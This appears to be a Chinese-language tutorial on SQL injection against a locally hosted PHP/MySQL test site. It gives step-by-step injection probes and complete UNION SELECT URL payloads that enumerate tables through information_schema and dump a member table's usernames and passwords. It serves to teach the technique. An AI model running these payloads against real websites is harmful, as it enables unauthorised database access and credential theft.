https://www.ixigua.com/i6808913583561245192/
大家好,今天給大家寫下如何滲透php+mysql網站,由於是測試我本地搭建了個網站
教程針對的是mysql5.0以上的版本!因為mysql5.0以上自帶的有information_schema數據庫,
information_schema:存儲mysql下所有信息的數據庫(數據庫名,表名,列名)。
用的工具是apmserv
php函數:
database():數據庫名
user():數據庫用戶
version():數據庫版本
Mysql數據庫結構
數據庫A
表名
列名
數據
數據庫B
表名
列名
數據
一、判斷是否存在注入點
先用 ' 單引號來測試
返回不正常,接著用and 來判斷
and 1=1 返回正常
and 1=2
返回錯誤
簡單兩步確認存在sql注入漏洞
二、order by
18正確
19錯誤(說明存在18個字段)
三、UNION SELECT 聯合查詢
http://192.168.1.30:88/article.php?id=-5 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
爆出的數字是2.3。我們把需要查詢的函數寫入2或者3上面來查詢
查詢數據庫名 用戶 數據庫版本,操作系統
四、爆數據庫下的所有表(數據庫名需要轉碼)
http://192.168.1.30:88/article.php?id=-5 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=0x6A69616E
五、爆數據庫下表下的列
http://192.168.1.30:88/article.php?id=-5 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name=0x6262736D656D626572
六、爆列下的內容
http://192.168.1.30:88/article.php?id=-5 UNION SELECT 1,group_concat(username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from bbsmember
賬號密碼都是admin
學習黑客技術的話 可以關注我,每天都會有相應的教程發佈的!!!
感謝大家的支持
閱讀更多 黑客學習灬樑 的文章